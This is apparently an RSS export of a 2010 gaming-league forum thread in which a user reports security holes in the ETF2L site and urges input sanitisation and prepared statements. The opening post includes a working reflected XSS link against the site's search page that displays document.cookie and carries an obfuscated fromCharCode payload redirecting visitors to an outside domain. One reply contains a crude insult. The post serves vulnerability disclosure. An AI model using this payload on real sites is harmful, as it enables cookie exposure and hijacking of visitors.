<?xml version="1.0" ?><rss version="2.0">
    <channel>
	<title>ETF2L &#8211; Latest activity in &#8220;htmlentities is your friend, addslashes and stripslashes are not&#8221;</title>
	<link>https://staging.etf2l.org/forum/support/topic-14040/</link>
	<description><![CDATA[The latest posts to this topic.]]></description>
    	<item>
    	    <title>Reply by Arie</title>
    	    <link>https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=239036</link>
    	    <description><![CDATA[Community members willing and able to wade through 3 years of PHP WTFs, please rise.

I'll pass. GL ETF2L, get on it.]]></description>
    	    <guid isPermaLink="false">generator=rsdiscuss&#038;baseurl=https://staging.etf2l.org&#038;feed=forum&#038;forum=support&#038;topic=14040&#038;post=239036</guid>
    	    <pubDate>Mon, 01 Nov 2010 23:14:42 +0100</pubDate>
    	</item>
    	<item>
    	    <title>Reply by adam-skyride</title>
    	    <link>https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=238985</link>
    	    <description><![CDATA[This man is indeed an utter cock, but he's right.]]></description>
    	    <guid isPermaLink="false">generator=rsdiscuss&#038;baseurl=https://staging.etf2l.org&#038;feed=forum&#038;forum=support&#038;topic=14040&#038;post=238985</guid>
    	    <pubDate>Mon, 01 Nov 2010 20:11:54 +0100</pubDate>
    	</item>
    	<item>
    	    <title>Reply by Admirable</title>
    	    <link>https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=238981</link>
    	    <description><![CDATA[:&#62;]]></description>
    	    <guid isPermaLink="false">generator=rsdiscuss&#038;baseurl=https://staging.etf2l.org&#038;feed=forum&#038;forum=support&#038;topic=14040&#038;post=238981</guid>
    	    <pubDate>Mon, 01 Nov 2010 20:04:00 +0100</pubDate>
    	</item>
    	<item>
    	    <title>Created by klansm3n</title>
    	    <link>https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=238980</link>
    	    <description><![CDATA[<a href="http://etf2l.org/search/%22%3Cscript%3Ealert(document.cookie);eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,121,111,117,102,97,105,108,46,111,114,103,34));%3C/script%3E/">http://etf2l.org/search/%22%3Cscript%3Ealert(document.cookie);eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,121,111,117,102,97,105,108,46,111,114,103,34));%3C/script%3E/</a>Also the search function is broken.[/url]

Umptieth time I come across something like this on etf2l (XSS on team pages, country flags, recruitment posts, SQL-injection vulnerabilities on the RSS feed, forum tracker, video browser, etc). 

Stuff goes in -&#62; Sanitize for SQL-injections (time to look into prepared statements?)
Stuff comes out -&#62; Check for HTML and JS

This isn't rocket science.]]></description>
    	    <guid isPermaLink="false">generator=rsdiscuss&#038;baseurl=https://staging.etf2l.org&#038;feed=forum&#038;forum=support&#038;topic=14040&#038;post=238980</guid>
    	    <pubDate>Mon, 01 Nov 2010 19:57:39 +0100</pubDate>
    	</item>
    </channel>
</rss>